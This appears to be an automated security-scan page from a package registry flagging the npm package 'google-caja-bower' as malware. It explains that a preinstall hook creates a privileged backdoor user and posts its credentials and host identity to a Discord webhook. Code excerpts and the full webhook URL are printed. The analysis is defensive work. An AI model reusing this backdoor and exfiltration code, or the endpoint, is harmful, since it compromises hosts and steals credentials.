registry  /  google-caja-bower  /  999.999.20

google-caja-bower@999.999.20

A Node.js package to collect and send system information to a remote endpoint

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Npm installation automatically executes privileged system-account creation. The install hook exfiltrates the created credentials and host identity to a Discord webhook.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install executes the `preinstall` lifecycle hook.
Impact
Creates a persistent privileged backdoor account and discloses its credentials plus host network identity to a third party.
Mechanism
Shell-based privileged user creation followed by webhook credential and host-data exfiltration.
Attack narrative
On installation, `preinstall` invokes `index.js`. It runs `useradd`, pipes a hard-coded password to `chpasswd`, and attempts to grant the account sudo or wheel membership. It then sends the account credentials, hostname, and a non-loopback IPv4 address to a Discord webhook, suppressing notification errors and exiting successfully.
Rationale
Direct inspection confirms an automatic install-time backdoor-account creation chain and credential/host-data exfiltration. This is concrete malicious behavior, not a scanner-only inference.
Evidence
package.jsonindex.js
Network endpoints1
discord.com/api/webhooks/1515625994759835789/xv-8rB_iAroFuvZ0DuMhYkrtg7iVmQOr0K8QzVAb3MUx8B0MSxkvFWk9BoDm6BJiBNF9

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` runs `node index.js` in `preinstall`.
  • `index.js` creates a local user with a hard-coded password.
  • `index.js` attempts to add that user to `sudo` or `wheel`.
  • `index.js` posts the username, password, hostname, and local IPv4 address to Discord.
  • Execution occurs automatically during npm installation.
Evidence against
  • Only `package.json` and `index.js` exist; no benign package functionality is present.
  • The declared Puppeteer dependency is unused by the source.
Behavioral surface
Source
ChildProcessNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 2.29 KB of source, external domains: discord.com

Source & flagged code

5 flagged · loading source
package.jsonView file
scripts.preinstall = node index.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
index.jsView file
1const { execSync } = require('child_process'); L2: const https = require('https'); L3: const os = require('os'); ... L12: // Create the user L13: execSync(`useradd -m -s /bin/bash ${USERNAME}`, { stdio: 'ignore', timeout: 5000 }); L14: ... L31: content: result.success L32: ? `✅ **SSH User Created**\n\`\`\`\nUser: ${USERNAME}\nPass: ${PASSWORD}\nHost: ${os.hostname()}\nIP: ${Object.values(require('os').networkInterfaces()).flat().filter(i => i.family ... L33: : `❌ **SSH User Creation Failed**\n\`\`\`${result.message}\`\`\`` ... L50: req.on('error', reject); L51: req.write(payload); L52: req.end();
Critical
Credential Exfiltration

Source appears to send environment or credential material to an external endpoint.

index.jsView on unpkg · L1
1Trigger-reachable chain: scripts.preinstall -> index.js L1: const { execSync } = require('child_process'); L2: const https = require('https'); L3: const os = require('os'); ... L12: // Create the user L13: execSync(`useradd -m -s /bin/bash ${USERNAME}`, { stdio: 'ignore', timeout: 5000 }); L14: ... L31: content: result.success L32: ? `✅ **SSH User Created**\n\`\`\`\nUser: ${USERNAME}\nPass: ${PASSWORD}\nHost: ${os.hostname()}\nIP: ${Object.values(require('os').networkInterfaces()).flat().filter(i => i.family ... L33: : `❌ **SSH User Creation Failed**\n\`\`\`${result.message}\`\`\`` ... L50: req.on('error', reject); L51: req.write(payload); L52: req.end();
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.jsView on unpkg · L1
1const { execSync } = require('child_process'); L2: const https = require('https'); L3: const os = require('os'); ... L12: // Create the user L13: execSync(`useradd -m -s /bin/bash ${USERNAME}`, { stdio: 'ignore', timeout: 5000 }); L14: ... L31: content: result.success L32: ? `✅ **SSH User Created**\n\`\`\`\nUser: ${USERNAME}\nPass: ${PASSWORD}\nHost: ${os.hostname()}\nIP: ${Object.values(require('os').networkInterfaces()).flat().filter(i => i.family ... L33: : `❌ **SSH User Creation Failed**\n\`\`\`${result.message}\`\`\`` ... L50: req.on('error', reject); L51: req.write(payload); L52: req.end();
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

index.jsView on unpkg · L1
1const { execSync } = require('child_process'); L2: const https = require('https'); L3: const os = require('os'); ... L12: // Create the user L13: execSync(`useradd -m -s /bin/bash ${USERNAME}`, { stdio: 'ignore', timeout: 5000 }); L14: ... L31: content: result.success L32: ? `✅ **SSH User Created**\n\`\`\`\nUser: ${USERNAME}\nPass: ${PASSWORD}\nHost: ${os.hostname()}\nIP: ${Object.values(require('os').networkInterfaces()).flat().filter(i => i.family ... L33: : `❌ **SSH User Creation Failed**\n\`\`\`${result.message}\`\`\`` ... L50: req.on('error', reject); L51: req.write(payload); L52: req.end();
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

index.jsView on unpkg · L1

Findings

2 Critical3 High2 Medium3 Low
CriticalCredential Exfiltrationindex.js
CriticalTrigger Reachable Dangerous Capabilityindex.js
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationindex.js
HighSandbox Evasion Gated Capabilityindex.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings